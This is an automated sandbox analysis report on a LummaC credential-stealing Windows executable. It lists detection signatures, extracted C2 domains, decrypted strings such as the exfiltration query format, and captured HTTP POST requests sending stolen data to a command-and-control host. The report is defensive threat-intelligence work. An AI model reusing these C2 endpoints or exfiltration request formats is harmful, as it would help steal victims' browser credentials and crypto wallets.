Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0WO49yZcDA.exe

Overview

General Information

Sample name:0WO49yZcDA.exe
renamed because original name is a hash value
Original sample name:91e4f1ab8170b4af79ec38f14533f6c4.exe
Analysis ID:1578981
MD5:91e4f1ab8170b4af79ec38f14533f6c4
SHA1:1b34ee9ec2d2bb2f861a30f7adc6c878e27511ec
SHA256:bb5655c486554fcceffdd7df4042befb5e22f3226713f4987292203773c984d0
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • 0WO49yZcDA.exe (PID: 1732 cmdline: "C:\Users\user\Desktop\0WO49yZcDA.exe" MD5: 91E4F1AB8170B4AF79EC38F14533F6C4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "energyaffai.lat", "aspecteirs.lat", "discokeyus.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2412704361.0000000001996000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2503586892.0000000001996000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2437512461.0000000001996000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2462451964.0000000001996000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 5 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T17:24:43.662669+010020283713Unknown Traffic192.168.2.549717104.21.21.99443TCP
                2024-12-20T17:24:45.850636+010020283713Unknown Traffic192.168.2.549721104.21.21.99443TCP
                2024-12-20T17:24:48.675771+010020283713Unknown Traffic192.168.2.549724104.21.21.99443TCP
                2024-12-20T17:24:51.065025+010020283713Unknown Traffic192.168.2.549727104.21.21.99443TCP
                2024-12-20T17:24:53.773140+010020283713Unknown Traffic192.168.2.549728104.21.21.99443TCP
                2024-12-20T17:24:56.161439+010020283713Unknown Traffic192.168.2.549731104.21.21.99443TCP
                2024-12-20T17:24:58.990580+010020283713Unknown Traffic192.168.2.549732104.21.21.99443TCP
                2024-12-20T17:25:02.023218+010020283713Unknown Traffic192.168.2.549734104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T17:24:44.423127+010020546531A Network Trojan was detected192.168.2.549717104.21.21.99443TCP
                2024-12-20T17:24:46.842774+010020546531A Network Trojan was detected192.168.2.549721104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T17:24:44.423127+010020498361A Network Trojan was detected192.168.2.549717104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T17:24:46.842774+010020498121A Network Trojan was detected192.168.2.549721104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T17:24:43.662669+010020583611Domain Observed Used for C2 Detected192.168.2.549717104.21.21.99443TCP
                2024-12-20T17:24:45.850636+010020583611Domain Observed Used for C2 Detected192.168.2.549721104.21.21.99443TCP
                2024-12-20T17:24:48.675771+010020583611Domain Observed Used for C2 Detected192.168.2.549724104.21.21.99443TCP
                2024-12-20T17:24:51.065025+010020583611Domain Observed Used for C2 Detected192.168.2.549727104.21.21.99443TCP
                2024-12-20T17:24:53.773140+010020583611Domain Observed Used for C2 Detected192.168.2.549728104.21.21.99443TCP
                2024-12-20T17:24:56.161439+010020583611Domain Observed Used for C2 Detected192.168.2.549731104.21.21.99443TCP
                2024-12-20T17:24:58.990580+010020583611Domain Observed Used for C2 Detected192.168.2.549732104.21.21.99443TCP
                2024-12-20T17:25:02.023218+010020583611Domain Observed Used for C2 Detected192.168.2.549734104.21.21.99443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T17:24:42.292481+010020583601Domain Observed Used for C2 Detected192.168.2.5546181.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T17:24:42.151073+010020583641Domain Observed Used for C2 Detected192.168.2.5577951.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T17:24:42.007547+010020583781Domain Observed Used for C2 Detected192.168.2.5629121.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-20T17:24:57.205488+010020480941Malware Command and Control Activity Detected192.168.2.549731104.21.21.99443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: 0WO49yZcDA.exeAvira: detected
                Found malware configuration
                Source: 0WO49yZcDA.exe.1732.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["sustainskelet.lat", "rapeflowwj.lat", "grannyejh.lat", "crosshuaht.lat", "necklacebudi.lat", "energyaffai.lat", "aspecteirs.lat", "discokeyus.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: 0WO49yZcDA.exeReversingLabs: Detection: 65%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: 0WO49yZcDA.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: rapeflowwj.lat
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: crosshuaht.lat
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: sustainskelet.lat
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: aspecteirs.lat
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: energyaffai.lat
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacebudi.lat
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: discokeyus.lat
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: grannyejh.lat
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: sweepyribs.lat
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2513053695.0000000000F71000.00000040.00000001.01000000.00000003.sdmpString decryptor: PsFKDg--pablo
                Source: 0WO49yZcDA.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49724 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.21.99:443 -> 192.168.2.5:49732 version: TLS 1.2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.5:62912 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.5:54618 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49717 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49721 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49732 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49731 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49724 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.5:57795 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49734 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49727 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.5:49728 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49717 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49717 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49731 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49721 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49721 -> 104.21.21.99:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: sustainskelet.lat
                Source: Malware configuration extractorURLs: rapeflowwj.lat
                Source: Malware configuration extractorURLs: grannyejh.lat
                Source: Malware configuration extractorURLs: crosshuaht.lat
                Source: Malware configuration extractorURLs: necklacebudi.lat
                Source: Malware configuration extractorURLs: energyaffai.lat
                Source: Malware configuration extractorURLs: aspecteirs.lat
                Source: Malware configuration extractorURLs: discokeyus.lat
                Source: Malware configuration extractorURLs: sweepyribs.lat
                Source: Joe Sandbox ViewIP Address: 104.21.21.99 104.21.21.99
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49721 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49732 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49724 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49734 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49727 -> 104.21.21.99:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 104.21.21.99:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0BYKMF78EM1G5TZVS53User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=IT89N01QY0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15029Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YDADZDCTSSFX6QBKKQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20567Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YEI62A1UWSBOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1220Host: discokeyus.lat
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z3PDZSBFPSX6OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550974Host: discokeyus.lat
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2439195494.00000000019EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
                Source: 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat//
                Source: 0WO49yZcDA.exe, 00000000.00000002.2515977981.0000000006137000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/2
                Source: 0WO49yZcDA.exe, 00000000.00000003.2385788262.000000000611F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/F
                Source: 0WO49yZcDA.exe, 00000000.00000003.2480452925.00000000019FD000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412277604.00000000019FD000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412003165.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiTEZG2
                Source: 0WO49yZcDA.exe, 00000000.00000002.2515911924.00000000060A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apiiL
                Source: 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/apilv
                Source: 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/c
                Source: 0WO49yZcDA.exe, 00000000.00000003.2503433908.000000000612C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/ddryb
                Source: 0WO49yZcDA.exe, 00000000.00000003.2412242953.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412003165.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437684688.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2414252491.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/nlTW
                Source: 0WO49yZcDA.exe, 00000000.00000003.2462352801.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2480307316.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437684688.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2467059353.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503433908.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/qMZ1L
                Source: 0WO49yZcDA.exe, 0WO49yZcDA.exe, 00000000.00000003.2503662736.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2438974726.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/api
                Source: 0WO49yZcDA.exe, 00000000.00000003.2503662736.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apial
                Source: 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apifi
                Source: 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat:443/apiv6zchhhv.default-release/key4.dbPK
                Source: 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
